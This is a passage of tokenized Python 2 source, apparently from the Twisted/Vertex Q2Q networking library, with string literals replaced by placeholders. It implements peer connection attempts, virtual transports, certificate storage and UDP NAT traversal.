extend ( atts ) <EOL> attemptDeferreds = [ att . startAttempt ( ) for att in attemptObjects ] <EOL> d = defer . DeferredList ( attemptDeferreds , <EOL> fireOnOneCallback = True , <EOL> fireOnOneErrback = False ) <EOL> def dontLogThat ( e ) : <EOL> e . trap ( error . ConnectionLost , error . ConnectionDone ) <EOL> for attDef in attemptDeferreds : <EOL> attDef . addErrback ( dontLogThat ) <EOL> def _unfortunate_defer_hack ( results ) : <EOL> if isinstance ( results , tuple ) : <EOL> stuff = [ ( False , None ) ] * len ( attemptObjects ) <EOL> stuff [ results [ <NUM_LIT:1> ] ] = ( True , results [ <NUM_LIT:0> ] ) <EOL> return stuff <EOL> return results <EOL> def gotResults ( results ) : <EOL> theResult = None <EOL> anyResult = False <EOL> for index , ( success , result ) in enumerate ( results ) : <EOL> if success : <EOL> theResult = result <EOL> anyResult = True <EOL> else : <EOL> attemptObjects [ index ] . cancel ( ) <EOL> if anyResult : <EOL> return theResult . subProtocol <EOL> else : <EOL> reason = Failure ( AttemptsFailed ( [ fobj for ( f , fobj ) in results ] ) ) <EOL> return reason <EOL> d . addCallback ( _unfortunate_defer_hack ) <EOL> d . addCallback ( gotResults ) <EOL> return d <EOL> def listen ( self , fromAddress , protocols , serverDescription ) : <EOL> return self . callRemote ( <EOL> Listen , From = fromAddress , <EOL> protocols = protocols , description = serverDescription ) <EOL> def connect ( self , From , to , <EOL> protocolName , clientFactory , <EOL> chooser ) : <EOL> """<STR_LIT>""" <EOL> publicIP = self . _determinePublicIP ( ) <EOL> A = dict ( From = From , <EOL> to = to , <EOL> protocol = protocolName ) <EOL> if self . service . dispatcher is not None : <EOL> A [ '<STR_LIT>' ] = ( publicIP , <EOL> self . service . sharedUDPPortnum ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" ) <EOL> D = self . callRemote ( Inbound , ** A ) <EOL> def _connected ( answer ) : <EOL> listenersD = defer . 
maybeDeferred ( chooser , answer [ '<STR_LIT>' ] ) <EOL> def gotListeners ( listeners ) : <EOL> allConnectionAttempts = [ ] <EOL> for listener in listeners : <EOL> d = self . attemptConnectionMethods ( <EOL> listener [ '<STR_LIT>' ] , <EOL> listener [ '<STR_LIT:id>' ] , <EOL> From , to , <EOL> protocolName , clientFactory , <EOL> ) <EOL> allConnectionAttempts . append ( d ) <EOL> return defer . DeferredList ( allConnectionAttempts ) <EOL> listenersD . addCallback ( gotListeners ) <EOL> def finishedAllAttempts ( results ) : <EOL> succeededAny = False <EOL> failures = [ ] <EOL> if not results : <EOL> return Failure ( NoAttemptsMade ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( From , to , protocolName ) ) ) <EOL> for succeeded , result in results : <EOL> if succeeded : <EOL> succeededAny = True <EOL> randomConnection = result <EOL> break <EOL> else : <EOL> failures . append ( result ) <EOL> if not succeededAny : <EOL> return Failure ( AttemptsFailed ( <EOL> [ failure . getBriefTraceback ( ) for failure in failures ] ) ) <EOL> return randomConnection <EOL> return listenersD . addCallback ( finishedAllAttempts ) <EOL> return D . addCallback ( _connected ) <EOL> class SeparateConnectionTransport ( object ) : <EOL> def __init__ ( self , <EOL> service , <EOL> subProtocol , <EOL> q2qhost , <EOL> q2qpeer , <EOL> protocolName , <EOL> connectionEstablishedDeferred = None ) : <EOL> self . service = service <EOL> self . subProtocol = subProtocol <EOL> self . q2qhost = q2qhost <EOL> self . q2qpeer = q2qpeer <EOL> self . protocolName = protocolName <EOL> self . connectionEstablishedDeferred = connectionEstablishedDeferred <EOL> subProtocol = None <EOL> q2qhost = None <EOL> q2qpeer = None <EOL> protocolName = '<STR_LIT>' <EOL> disconnecting = property ( lambda self : self . transport . disconnecting ) <EOL> def getQ2QHost ( self ) : <EOL> return self . q2qhost <EOL> def getQ2QPeer ( self ) : <EOL> return self . q2qpeer <EOL> def makeConnection ( self , tpt ) : <EOL> self . 
transport = tpt <EOL> self . service . subConnections . append ( self ) <EOL> self . subProtocol . makeConnection ( self ) <EOL> if self . connectionEstablishedDeferred is not None : <EOL> self . connectionEstablishedDeferred . callback ( self ) <EOL> def getPeer ( self ) : <EOL> return Q2QTransportAddress ( self . getQ2QPeer ( ) , <EOL> self . transport . getPeer ( ) , <EOL> self . protocolName ) <EOL> def getHost ( self ) : <EOL> return Q2QTransportAddress ( self . getQ2QHost ( ) , <EOL> self . transport . getHost ( ) , <EOL> self . protocolName ) <EOL> def dataReceived ( self , data ) : <EOL> self . subProtocol . dataReceived ( data ) <EOL> def write ( self , data ) : <EOL> self . transport . write ( data ) <EOL> def writeSequence ( self , data ) : <EOL> self . transport . writeSequence ( data ) <EOL> def registerProducer ( self , producer , streaming ) : <EOL> self . transport . registerProducer ( producer , streaming ) <EOL> def unregisterProducer ( self ) : <EOL> self . transport . unregisterProducer ( ) <EOL> def loseConnection ( self ) : <EOL> self . transport . loseConnection ( ) <EOL> def connectionLost ( self , reason ) : <EOL> self . service . subConnections . remove ( self ) <EOL> if self . subProtocol is not None : <EOL> self . subProtocol . connectionLost ( reason ) <EOL> self . subProtocol = None <EOL> class WhoAmI ( Command ) : <EOL> commandName = '<STR_LIT>' <EOL> response = [ <EOL> ( '<STR_LIT:address>' , HostPort ( ) ) , <EOL> ] <EOL> class RetrieveConnection ( ProtocolSwitchCommand ) : <EOL> commandName = '<STR_LIT>' <EOL> arguments = [ <EOL> ( '<STR_LIT>' , String ( ) ) , <EOL> ] <EOL> fatalErrors = { KeyError : "<STR_LIT>" } <EOL> class Q2QBootstrap ( AMP ) : <EOL> def __init__ ( self , connIdentifier = None , protoFactory = None ) : <EOL> AMP . __init__ ( self ) <EOL> assert connIdentifier is None or isinstance ( connIdentifier , ( str ) ) <EOL> self . connIdentifier = connIdentifier <EOL> self . 
protoFactory = protoFactory <EOL> def connectionMade ( self ) : <EOL> if self . connIdentifier is not None : <EOL> def swallowKnown ( err ) : <EOL> err . trap ( error . ConnectionDone , KeyError ) <EOL> self . retrieveConnection ( self . connIdentifier , self . protoFactory ) . addErrback ( swallowKnown ) <EOL> def whoami ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbWhoAmI ( result ) : <EOL> return result [ '<STR_LIT:address>' ] <EOL> return self . callRemote ( WhoAmI ) . addCallback ( cbWhoAmI ) <EOL> def _whoami ( self ) : <EOL> peer = self . transport . getPeer ( ) <EOL> return { <EOL> '<STR_LIT:address>' : ( peer . host , peer . port ) , <EOL> } <EOL> WhoAmI . responder ( _whoami ) <EOL> def retrieveConnection ( self , identifier , factory ) : <EOL> return self . callRemote ( RetrieveConnection , factory , identifier = identifier ) <EOL> def _retrieveConnection ( self , identifier ) : <EOL> listenerInfo = self . service . lookupListener ( identifier ) <EOL> if listenerInfo is None : <EOL> raise KeyError ( identifier ) <EOL> else : <EOL> proto = listenerInfo . protocolFactory . buildProtocol ( listenerInfo . From ) <EOL> return SeparateConnectionTransport ( <EOL> self . service , <EOL> proto , <EOL> listenerInfo . to , <EOL> listenerInfo . From , <EOL> listenerInfo . protocolName ) <EOL> RetrieveConnection . responder ( _retrieveConnection ) <EOL> class Q2QBootstrapFactory ( protocol . Factory ) : <EOL> protocol = Q2QBootstrap <EOL> def __init__ ( self , service ) : <EOL> self . service = service <EOL> def buildProtocol ( self , addr ) : <EOL> q2etc = protocol . Factory . buildProtocol ( self , addr ) <EOL> q2etc . service = self . service <EOL> return q2etc <EOL> class VirtualTransport ( subproducer . SubProducer ) : <EOL> implements ( interfaces . IProducer , interfaces . ITransport , interfaces . IConsumer ) <EOL> disconnecting = False <EOL> def __init__ ( self , q2q , connectionID , protocolFactory , isClient ) : <EOL> """<STR_LIT>""" <EOL> subproducer . 
SubProducer . __init__ ( self , q2q ) <EOL> self . q2q = q2q <EOL> self . id = connectionID <EOL> self . isClient = isClient <EOL> self . q2q . connections [ self . id ] = self <EOL> self . protocolFactory = protocolFactory <EOL> protocol = None <EOL> def startProtocol ( self ) : <EOL> self . protocol = self . protocolFactory . buildProtocol ( self . getPeer ( ) ) <EOL> self . protocol . makeConnection ( self ) <EOL> return self . protocol <EOL> def pauseProducing ( self ) : <EOL> self . q2q . callRemote ( Choke , id = self . id ) <EOL> def resumeProducing ( self ) : <EOL> self . q2q . callRemote ( Unchoke , id = self . id ) <EOL> def writeSequence ( self , iovec ) : <EOL> self . write ( '<STR_LIT>' . join ( iovec ) ) <EOL> def loseConnection ( self ) : <EOL> if self . disconnecting : <EOL> return <EOL> self . disconnecting = True <EOL> d = self . q2q . callRemoteString ( '<STR_LIT>' , id = str ( self . id ) ) <EOL> def cbClosed ( ignored ) : <EOL> self . connectionLost ( Failure ( CONNECTION_DONE ) ) <EOL> def ebClosed ( reason ) : <EOL> if self . id in self . q2q . connections : <EOL> self . connectionLost ( reason ) <EOL> elif not reason . check ( error . ConnectionDone ) : <EOL> log . err ( reason , "<STR_LIT>" % ( self . id , ) ) <EOL> d . addCallbacks ( cbClosed , ebClosed ) <EOL> def connectionLost ( self , reason ) : <EOL> del self . q2q . connections [ self . id ] <EOL> if self . protocol is not None : <EOL> self . protocol . connectionLost ( reason ) <EOL> if self . isClient : <EOL> self . protocolFactory . clientConnectionLost ( None , reason ) <EOL> def dataReceived ( self , data ) : <EOL> try : <EOL> self . protocol . dataReceived ( data ) <EOL> except : <EOL> reason = Failure ( ) <EOL> log . err ( reason ) <EOL> self . connectionLost ( reason ) <EOL> def write ( self , data ) : <EOL> self . q2q . callRemoteString ( <EOL> '<STR_LIT>' , False , body = data , id = str ( self . 
id ) ) <EOL> def getHost ( self ) : <EOL> return VirtualTransportAddress ( self . q2q . transport . getHost ( ) ) <EOL> def getPeer ( self ) : <EOL> return VirtualTransportAddress ( self . q2q . transport . getPeer ( ) ) <EOL> _counter = <NUM_LIT:0> <EOL> def _nextJuiceLog ( ) : <EOL> global _counter <EOL> try : <EOL> return str ( _counter ) <EOL> finally : <EOL> _counter = _counter + <NUM_LIT:1> <EOL> class DefaultQ2QAvatar : <EOL> implements ( ivertex . IQ2QUser ) <EOL> def __init__ ( self , username , domain ) : <EOL> self . username = username <EOL> self . domain = domain <EOL> def signCertificateRequest ( self , certificateRequest , <EOL> domainCert , suggestedSerial ) : <EOL> keyz = certificateRequest . getSubject ( ) . keys ( ) <EOL> if keyz != [ '<STR_LIT>' ] : <EOL> raise BadCertificateRequest ( <EOL> "<STR_LIT>" + <EOL> repr ( keyz ) ) <EOL> newCert = domainCert . signRequestObject ( <EOL> certificateRequest , <EOL> suggestedSerial ) <EOL> log . msg ( '<STR_LIT>' % ( <EOL> self . username , self . domain , newCert . digest ( ) ) ) <EOL> return newCert <EOL> class DefaultCertificateStore : <EOL> implements ( ICredentialsChecker , IRealm ) <EOL> credentialInterfaces = [ IUsernamePassword ] <EOL> def requestAvatar ( self , avatarId , mind , interface ) : <EOL> assert interface is ivertex . IQ2QUser , ( <EOL> "<STR_LIT>" ) <EOL> return interface , DefaultQ2QAvatar ( * avatarId . split ( "<STR_LIT:@>" ) ) , lambda : None <EOL> def requestAvatarId ( self , credentials ) : <EOL> username , domain = credentials . username . split ( "<STR_LIT:@>" ) <EOL> pw = self . users . get ( ( domain , username ) ) <EOL> if pw is None : <EOL> return defer . fail ( UnauthorizedLogin ( ) ) <EOL> def _ ( passwordIsCorrect ) : <EOL> if passwordIsCorrect : <EOL> return username + '<STR_LIT:@>' + domain <EOL> else : <EOL> raise UnauthorizedLogin ( ) <EOL> return defer . maybeDeferred ( <EOL> credentials . checkPassword , pw ) . 
addCallback ( _ ) <EOL> def __init__ ( self ) : <EOL> self . remoteStore = { } <EOL> self . localStore = { } <EOL> self . users = { } <EOL> def getSelfSignedCertificate ( self , domainName ) : <EOL> return defer . maybeDeferred ( self . remoteStore . __getitem__ , domainName ) <EOL> def addUser ( self , domain , username , privateSecret ) : <EOL> self . users [ domain , username ] = privateSecret <EOL> def checkUser ( self , domain , username , privateSecret ) : <EOL> if self . users . get ( ( domain , username ) ) != privateSecret : <EOL> return defer . fail ( KeyError ( ) ) <EOL> return defer . succeed ( True ) <EOL> def storeSelfSignedCertificate ( self , domainName , mainCert ) : <EOL> """<STR_LIT>""" <EOL> assert not isinstance ( mainCert , str ) <EOL> return defer . maybeDeferred ( self . remoteStore . __setitem__ , domainName , mainCert ) <EOL> def getPrivateCertificate ( self , domainName ) : <EOL> """<STR_LIT>""" <EOL> return self . localStore [ domainName ] <EOL> def genSerial ( self , name ) : <EOL> return abs ( struct . unpack ( '<STR_LIT>' , md5 ( name ) . digest ( ) [ : <NUM_LIT:4> ] ) [ <NUM_LIT:0> ] ) <EOL> def addPrivateCertificate ( self , subjectName , existingCertificate = None ) : <EOL> """<STR_LIT>""" <EOL> if existingCertificate is None : <EOL> assert '<STR_LIT:@>' not in subjectName , "<STR_LIT>" <EOL> mainDN = DistinguishedName ( commonName = subjectName ) <EOL> mainKey = KeyPair . generate ( ) <EOL> mainCertReq = mainKey . certificateRequest ( mainDN ) <EOL> mainCertData = mainKey . signCertificateRequest ( mainDN , mainCertReq , <EOL> lambda dn : True , <EOL> self . genSerial ( subjectName ) ) <EOL> mainCert = mainKey . newCertificate ( mainCertData ) <EOL> else : <EOL> mainCert = existingCertificate <EOL> self . localStore [ subjectName ] = mainCert <EOL> import os <EOL> class _pemmap ( object ) : <EOL> def __init__ ( self , pathname , certclass ) : <EOL> self . pathname = pathname <EOL> try : <EOL> os . 
makedirs ( pathname ) <EOL> except ( OSError , IOError ) : <EOL> pass <EOL> self . certclass = certclass <EOL> def file ( self , name , mode ) : <EOL> try : <EOL> return file ( os . path . join ( self . pathname , name ) + '<STR_LIT>' , mode ) <EOL> except IOError , ioe : <EOL> raise KeyError ( name , ioe ) <EOL> def __setitem__ ( self , key , cert ) : <EOL> kn = cert . getSubject ( ) . commonName <EOL> assert kn == key <EOL> self . file ( kn , '<STR_LIT:wb>' ) . write ( cert . dumpPEM ( ) ) <EOL> def __getitem__ ( self , cn ) : <EOL> return self . certclass . loadPEM ( self . file ( cn , '<STR_LIT:rb>' ) . read ( ) ) <EOL> def iteritems ( self ) : <EOL> files = os . listdir ( self . pathname ) <EOL> for file in files : <EOL> if file . endswith ( '<STR_LIT>' ) : <EOL> key = file [ : - <NUM_LIT:4> ] <EOL> value = self [ key ] <EOL> yield key , value <EOL> def items ( self ) : <EOL> return list ( self . iteritems ( ) ) <EOL> def iterkeys ( self ) : <EOL> for k , v in self . iteritems ( ) : <EOL> yield k <EOL> def keys ( self ) : <EOL> return list ( self . iterkeys ( ) ) <EOL> def itervalues ( self ) : <EOL> for k , v in self . iteritems ( ) : <EOL> yield v <EOL> def values ( self ) : <EOL> return list ( self . itervalues ( ) ) <EOL> class DirectoryCertificateStore ( DefaultCertificateStore ) : <EOL> def __init__ ( self , filepath ) : <EOL> self . remoteStore = _pemmap ( os . path . join ( filepath , '<STR_LIT>' ) , <EOL> Certificate ) <EOL> self . localStore = _pemmap ( os . path . join ( filepath , '<STR_LIT>' ) , <EOL> PrivateCertificate ) <EOL> class MessageSender ( AMP ) : <EOL> """<STR_LIT:U+0020>""" <EOL> theMessageFactory = protocol . ClientFactory ( ) <EOL> theMessageFactory . protocol = MessageSender <EOL> _ConnectionWaiter = namedtuple ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> class Q2QClientFactory ( protocol . ClientFactory ) : <EOL> protocol = Q2Q <EOL> def __init__ ( self , service ) : <EOL> self . 
service = service <EOL> def buildProtocol ( self , addr ) : <EOL> p = protocol . ClientFactory . buildProtocol ( self , addr ) <EOL> p . isServer = False <EOL> p . service = self . service <EOL> p . factory = self <EOL> p . wrapper = self . service . wrapper <EOL> return p <EOL> class YourAddress ( Command ) : <EOL> arguments = [ <EOL> ( '<STR_LIT:address>' , HostPort ( ) ) , <EOL> ] <EOL> class AddressDiscoveryProtocol ( Q2QBootstrap ) : <EOL> def __init__ ( self , addrDiscDef ) : <EOL> Q2QBootstrap . __init__ ( self ) <EOL> self . addrDiscDef = addrDiscDef <EOL> def connectionMade ( self ) : <EOL> self . whoami ( ) . chainDeferred ( self . addrDiscDef ) <EOL> class _AddressDiscoveryFactory ( protocol . ClientFactory ) : <EOL> def __init__ ( self , addressDiscoveredDeferred ) : <EOL> self . addressDiscoveredDeferred = addressDiscoveredDeferred <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> self . addressDiscoveredDeferred . errback ( reason ) <EOL> def clientConnectionLost ( self , connector , reason ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def buildProtocol ( self , addr ) : <EOL> adp = AddressDiscoveryProtocol ( self . addressDiscoveredDeferred ) <EOL> return adp <EOL> def _noResults ( * x ) : <EOL> return [ ] <EOL> class PTCPConnectionDispatcher ( object ) : <EOL> def __init__ ( self , factory ) : <EOL> self . factory = factory <EOL> self . _ports = { } <EOL> def seedNAT ( self , ( host , port ) , sourcePort = <NUM_LIT:0> , conditional = True ) : <EOL> if sourcePort not in self . _ports : <EOL> if sourcePort != <NUM_LIT:0> : <EOL> if conditional : <EOL> return None <EOL> else : <EOL> raise AssertionError ( '<STR_LIT>' % <EOL> ( sourcePort , self , self . _ports , self . factory . service ) ) <EOL> sourcePort = self . bindNewPort ( sourcePort ) <EOL> else : <EOL> assert sourcePort != <NUM_LIT:0> <EOL> p , proto = self . _ports [ sourcePort ] <EOL> p . 
write ( '<STR_LIT>' , ( host , port ) ) <EOL> return sourcePort <EOL> def bindNewPort ( self , portNum = <NUM_LIT:0> , iface = '<STR_LIT>' ) : <EOL> iPortNum = portNum <EOL> proto = ptcp . PTCP ( self . factory ) <EOL> p = reactor . listenUDP ( portNum , proto , interface = iface ) <EOL> portNum = p . getHost ( ) . port <EOL> log . msg ( "<STR_LIT>" % ( iPortNum , portNum ) ) <EOL> self . _ports [ portNum ] = ( p , proto ) <EOL> return portNum <EOL> def unbindPort ( self , portNum ) : <EOL> log . msg ( "<STR_LIT>" % portNum ) <EOL> port , proto = self . _ports . pop ( portNum ) <EOL> proto . cleanupAndClose ( ) <EOL> def connectPTCP ( self , host , port , factory , sourcePort ) : <EOL> p , proto = self . _ports [ sourcePort ] <EOL> return proto . connect ( factory , host , port ) <EOL> def iterconnections ( self ) : <EOL> for ( p , proto ) in self . _ports . itervalues ( ) : <EOL> for c in p . protocol . _connections . itervalues ( ) : <EOL> if c . protocol is not None : <EOL> yield c . protocol <EOL> else : <EOL> pass <EOL> def killAllConnections ( self ) : <EOL> dl = [ ] <EOL> for p , proto in self . _ports . itervalues ( ) : <EOL> for c in p . protocol . _connections . itervalues ( ) : <EOL> c . _stopRetransmitting ( ) <EOL> dl . append ( defer . maybeDeferred ( p . stopListening ) ) <EOL> self . _ports = { } <EOL> return defer . DeferredList ( dl ) <EOL> class Q2QService ( service . MultiService , protocol . ServerFactory ) : <EOL> publicIP = None <EOL> _publicIPIsReallyPrivate = False <EOL> debugName = '<STR_LIT>' <EOL> protocol = Q2Q <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . debugName , id ( self ) ) <EOL> def buildProtocol ( self , addr ) : <EOL> p = protocol . ServerFactory . buildProtocol ( self , addr ) <EOL> p . isServer = True <EOL> p . service = self <EOL> p . factory = self <EOL> p . wrapper = self . wrapper <EOL> return p <EOL> def iterconnections ( self ) : <EOL> """<STR_LIT>""" <EOL> return itertools . chain ( <EOL> self . 
appConnectionCache . cachedConnections . itervalues ( ) , <EOL> self . secureConnectionCache . cachedConnections . itervalues ( ) , <EOL> iter ( self . subConnections ) , <EOL> ( self . dispatcher or ( ) ) and self . dispatcher . iterconnections ( ) ) <EOL> def __init__ ( self , <EOL> protocolFactoryFactory = None , <EOL> certificateStorage = None , wrapper = None , <EOL> q2qPortnum = port , <EOL> inboundTCPPortnum = None , <EOL> publicIP = None , <EOL> udpEnabled = None , <EOL> portal = None , <EOL> verifyHook = None ) : <EOL> """<STR_LIT>""" <EOL> if udpEnabled is not None : <EOL> self . udpEnabled = udpEnabled <EOL> if protocolFactoryFactory is None : <EOL> protocolFactoryFactory = _noResults <EOL> self . protocolFactoryFactory = protocolFactoryFactory <EOL> if certificateStorage is None : <EOL> certificateStorage = DefaultCertificateStore ( ) <EOL> if portal is None : <EOL> portal = Portal ( certificateStorage , checkers = [ certificateStorage ] ) <EOL> self . certificateStorage = certificateStorage <EOL> self . wrapper = wrapper <EOL> self . listeningClients = { } <EOL> self . inboundConnections = { } <EOL> self . q2qPortnum = q2qPortnum <EOL> self . inboundTCPPortnum = inboundTCPPortnum <EOL> self . subConnections = [ ] <EOL> self . localFactoriesMapping = { } <EOL> self . portal = portal <EOL> if publicIP is not None : <EOL> self . publicIP = publicIP <EOL> if verifyHook is not None : <EOL> self . verifyHook = verifyHook <EOL> self . appConnectionCache = ConnectionCache ( ) <EOL> self . secureConnectionCache = ConnectionCache ( ) <EOL> service . MultiService . __init__ ( self ) <EOL> inboundListener = None <EOL> _publicUDPPort = None <EOL> def verifyHook ( self , From , to , protocol ) : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> def _retrievePublicUDPPortNumber ( self , registrationServerAddress ) : <EOL> d = defer . Deferred ( ) <EOL> addressDiscoveryFactory = _AddressDiscoveryFactory ( d ) <EOL> host , port = registrationServerAddress <EOL> self . 
dispatcher . connectPTCP ( host , port , addressDiscoveryFactory , <EOL> self . sharedUDPPortnum ) <EOL> return d <EOL> def listenQ2Q ( self , fromAddress , protocolsToFactories , serverDescription ) : <EOL> """<STR_LIT>""" <EOL> myDomain = fromAddress . domainAddress ( ) <EOL> D = self . getSecureConnection ( fromAddress , myDomain ) <EOL> def _secured ( proto ) : <EOL> lfm = self . localFactoriesMapping <EOL> def startup ( listenResult ) : <EOL> for protocol , factory in protocolsToFactories . iteritems ( ) : <EOL> key = ( fromAddress , protocol ) <EOL> if key not in lfm : <EOL> lfm [ key ] = [ ] <EOL> lfm [ key ] . append ( ( factory , serverDescription ) ) <EOL> factory . doStart ( ) <EOL> def shutdown ( ) : <EOL> for protocol , factory in protocolsToFactories . iteritems ( ) : <EOL> lfm [ fromAddress , protocol ] . remove ( <EOL> ( factory , serverDescription ) ) <EOL> factory . doStop ( ) <EOL> proto . notifyOnConnectionLost ( shutdown ) <EOL> return listenResult <EOL> if self . dispatcher is not None : <EOL> gp = proto . transport . getPeer ( ) <EOL> udpAddress = ( gp . host , gp . port ) <EOL> pubUDPDeferred = self . _retrievePublicUDPPortNumber ( udpAddress ) <EOL> else : <EOL> pubUDPDeferred = defer . succeed ( None ) <EOL> def _gotPubUDPPort ( publicAddress ) : <EOL> self . _publicUDPAddress = publicAddress <EOL> return proto . listen ( fromAddress , protocolsToFactories . keys ( ) , <EOL> serverDescription ) . addCallback ( startup ) <EOL> pubUDPDeferred . addCallback ( _gotPubUDPPort ) <EOL> return pubUDPDeferred <EOL> D . addCallback ( _secured ) <EOL> return D <EOL> def requestCertificateForAddress ( self , fromAddress , sharedSecret ) : <EOL> """<STR_LIT>""" <EOL> kp = KeyPair . generate ( ) <EOL> subject = DistinguishedName ( commonName = str ( fromAddress ) ) <EOL> reqobj = kp . requestObject ( subject ) <EOL> fakereq = kp . requestObject ( subject ) <EOL> ssigned = kp . 
signRequestObject ( subject , fakereq , <NUM_LIT:1> ) <EOL> certpair = PrivateCertificate . fromCertificateAndKeyPair <EOL> fakecert = certpair ( ssigned , kp ) <EOL> apc = self . certificateStorage . addPrivateCertificate <EOL> def _2 ( secured ) : <EOL> D = secured . callRemote ( <EOL> Sign , <EOL> certificate_request = reqobj , <EOL> password = sharedSecret ) <EOL> def _1 ( dcert ) : <EOL> cert = dcert [ '<STR_LIT>' ] <EOL> privcert = certpair ( cert , kp ) <EOL> apc ( str ( fromAddress ) , privcert ) <EOL> return D . addCallback ( _1 ) <EOL> return self . getSecureConnection ( <EOL> fromAddress , fromAddress . domainAddress ( ) , authorize = False , <EOL> usePrivateCertificate = fakecert , <EOL> ) . addCallback ( _2 ) <EOL> def authorize ( self , fromAddress , password ) : <EOL> """<STR_LIT>""" <EOL> return self . requestCertificateForAddress ( fromAddress , password ) <EOL> _lastConnID = <NUM_LIT:1> <EOL> def _nextConnectionID ( self , From , to ) : <EOL> lcid = self . _lastConnID <EOL> self . _lastConnID += <NUM_LIT:1> <EOL> fmt = '<STR_LIT>' % ( <EOL> From , to , lcid ) <EOL> return fmt <EOL> def mapListener ( self , to , From , protocolName , protocolFactory , isClient = False ) : <EOL> """<STR_LIT>""" <EOL> listenerID = self . _nextConnectionID ( From , to ) <EOL> call = reactor . callLater ( <NUM_LIT> , <EOL> self . unmapListener , <EOL> listenerID ) <EOL> expires = datetime . datetime ( * time . localtime ( call . getTime ( ) ) [ : <NUM_LIT:7> ] ) <EOL> self . inboundConnections [ listenerID ] = ( <EOL> _ConnectionWaiter ( From , to , protocolName , protocolFactory , isClient ) , <EOL> call ) <EOL> return expires , listenerID <EOL> def unmapListener ( self , listenID ) : <EOL> del self . inboundConnections [ listenID ] <EOL> def lookupListener ( self , listenID ) : <EOL> """<STR_LIT>""" <EOL> if listenID in self . inboundConnections : <EOL> cwait , call = self . inboundConnections . pop ( listenID ) <EOL> call . 
cancel ( ) <EOL> return cwait <EOL> def getLocalFactories ( self , From , to , protocolName ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> x = self . localFactoriesMapping . get ( ( to , protocolName ) , ( ) ) <EOL> result . extend ( x ) <EOL> y = self . protocolFactoryFactory ( From , to , protocolName ) <EOL> result . extend ( y ) <EOL> return result <EOL> q2qPort = None <EOL> inboundTCPPort = None <EOL> inboundUDPPort = None <EOL> dispatcher = None <EOL> sharedUDPPortnum = None <EOL> udpEnabled = True <EOL> virtualEnabled = True <EOL> def startService ( self ) : <EOL> self . _bootstrapFactory = Q2QBootstrapFactory ( self ) <EOL> if self . udpEnabled : <EOL> self . dispatcher = PTCPConnectionDispatcher ( self . _bootstrapFactory ) <EOL> if self . q2qPortnum is not None : <EOL> self . q2qPort = reactor . listenTCP ( self . q2qPortnum , self ) <EOL> self . q2qPortnum = self . q2qPort . getHost ( ) . port <EOL> if self . dispatcher is not None : <EOL> self . sharedUDPPortnum = self . dispatcher . bindNewPort ( self . q2qPortnum , iface = self . publicIP or '<STR_LIT>' ) <EOL> if self . inboundTCPPortnum is not None : <EOL> self . inboundTCPPort = reactor . listenTCP ( <EOL> self . inboundTCPPortnum , <EOL> self . _bootstrapFactory ) <EOL> if self . sharedUDPPortnum is None and self . dispatcher is not None : <EOL> self . sharedUDPPortnum = self . dispatcher . bindNewPort ( ) <EOL> return service . MultiService . startService ( self ) <EOL> def stopService ( self ) : <EOL> dl = [ ] <EOL> for cwait , delayed in self . inboundConnections . itervalues ( ) : <EOL> delayed . cancel ( ) <EOL> self . inboundConnections . clear ( ) <EOL> if self . q2qPort is not None : <EOL> dl . append ( defer . maybeDeferred ( self . q2qPort . stopListening ) ) <EOL> if self . inboundTCPPort is not None : <EOL> dl . append ( defer . maybeDeferred ( self . inboundTCPPort . stopListening ) ) <EOL> if self . dispatcher is not None : <EOL> dl . append ( self . dispatcher . 
killAllConnections ( ) ) <EOL> dl . append ( self . appConnectionCache . shutdown ( ) ) <EOL> dl . append ( self . secureConnectionCache . shutdown ( ) ) <EOL> dl . append ( defer . maybeDeferred ( service . MultiService . stopService , self ) ) <EOL> for conn in self . subConnections : <EOL> dl . append ( defer . maybeDeferred ( conn . transport . loseConnection ) ) <EOL> return defer . DeferredList ( dl ) <EOL> def connectQ2Q ( self , fromAddress , toAddress , protocolName , protocolFactory , <EOL> usePrivateCertificate = None , fakeFromDomain = None , <EOL> chooser = None ) : <EOL> """<STR_LIT>""" <EOL> if chooser is None : <EOL> chooser = lambda x : x and [ x [ <NUM_LIT:0> ] ] <EOL> def onSecureConnection ( protocol ) : <EOL> if fakeFromDomain : <EOL> connectFromAddress = Q2QAddress ( fakeFromDomain , toAddress . resource ) <EOL> else : <EOL> connectFromAddress = fromAddress <EOL> return protocol . connect ( connectFromAddress , toAddress , <EOL> protocolName , protocolFactory , <EOL> chooser ) <EOL> def onSecureConnectionFailure ( reason ) : <EOL> protocolFactory . clientConnectionFailed ( None , reason ) <EOL> return reason <EOL> return self . getSecureConnection ( <EOL> fromAddress , toAddress , <EOL> port , usePrivateCertificate ) . addCallback ( <EOL> onSecureConnection ) . addErrback ( onSecureConnectionFailure ) <EOL> def getSecureConnection ( self , fromAddress , toAddress , port = port , <EOL> usePrivateCertificate = None , <EOL> authorize = True ) : <EOL> """<STR_LIT>""" <EOL> toDomain = toAddress . domainAddress ( ) <EOL> resolveme = reactor . resolve ( str ( toDomain ) ) <EOL> def cb ( toIPAddress , authorize = authorize ) : <EOL> GPS = self . certificateStorage . getPrivateCertificate <EOL> if usePrivateCertificate : <EOL> ourCert = usePrivateCertificate <EOL> cacheFrom = fromAddress <EOL> log . msg ( '<STR_LIT>' , fromAddress , ourCert , cacheFrom ) <EOL> elif fromAddress . domain == '<STR_LIT>' : <EOL> assert fromAddress . 
